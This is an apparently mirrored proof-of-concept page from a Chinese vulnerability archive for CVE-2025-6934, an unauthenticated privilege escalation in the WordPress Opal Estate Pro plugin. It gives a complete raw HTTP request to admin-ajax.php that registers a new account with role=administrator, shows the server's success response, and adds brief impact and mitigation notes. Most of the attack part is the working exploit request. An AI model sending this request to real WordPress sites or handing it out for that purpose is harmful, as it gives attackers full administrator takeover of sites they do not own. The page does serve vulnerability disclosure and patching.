关联漏洞
标题:
WordPress plugin Opal Estate Pro 安全漏洞
(CVE-2025-6934)
描述:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin Opal Estate Pro 1.7.5及之前版本存在安全漏洞,该漏洞源于on_regiser_user函数缺少角色限制,可能导致权限提升。
描述
CVE-2025-6934 POC
介绍
# 🚨 WordPress OpalEstate Plugin - Unauthenticated Privilege Escalation Vulnerability
## 🔎 Description
The **OpalEstate** plugin for WordPress contains a critical vulnerability in its AJAX registration handler, allowing **unauthenticated users to register as administrators**.
The issue lies in the insecure handling of the `role` parameter in the `opalestate_register_form` AJAX action, which is exposed publicly via `admin-ajax.php`. An attacker with a valid nonce can escalate privileges by simply submitting the `role=administrator` field, resulting in full site compromise.
CVE ID: CVE-2025-6934
CVSS Score: 9.8 (Critical)
Published: June 30, 2025
## 📋 Vulnerable Endpoint/ POC
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Length: 231
sec-ch-ua-platform: "Windows"
Accept-Language: en-US,en;q=0.9
sec-ch-ua: "Chromium";v="133", "Not(A:Brand";v="99"
sec-ch-ua-mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/wordpress/?page_id=16
Accept-Encoding: gzip, deflate, br
Cookie: wp-settings-time-1=1750938057; wp-settings-1=libraryContent%3Dbrowse; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; kawuda_cookie=1751024383267404614; PHPSESSID=rsbi6r8gs523c35v319f1jf4tt
Connection: keep-alive
username=mrjtest&email=mrjtest%40gmail.com&password=123&password1=123&role=administrator&confirmed_register=on&opalestate-register-nonce=db20fa048c&_wp_http_referer=%2Fwordpress%2F%3Fpage_id%3D16&ajax=1&action=opalestate_register_form
## Response
HTTP/1.1 200 OK
Date: Wed, 02 Jul 2025 14:19:23 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private
Pragma: no-cache
Content-Length: 53
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/json; charset=UTF-8
{"status":true,"redirect":"\/wordpress\/?page_id=16"}
## Impact
Full WordPress site takeover
Unauthenticated admin account creation
Persistent backdoor access
Potential for privilege chaining and plugin/theme exploitation
🛡️ Mitigation
Remove or sanitize the role parameter from user-controlled input.
Force role assignment server-side (e.g., subscriber only).
Use wp_insert_user() or wp_create_user() with locked roles.
Validate user capabilities before processing sensitive actions.
Patch the plugin or disable AJAX registration if not essential.
## BY MRJ HAXCORE
文件快照
[4.0K] /data/pocs/035fc035de2d1fbabad708b40ab16b2cc403ae5c
└── [2.7K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。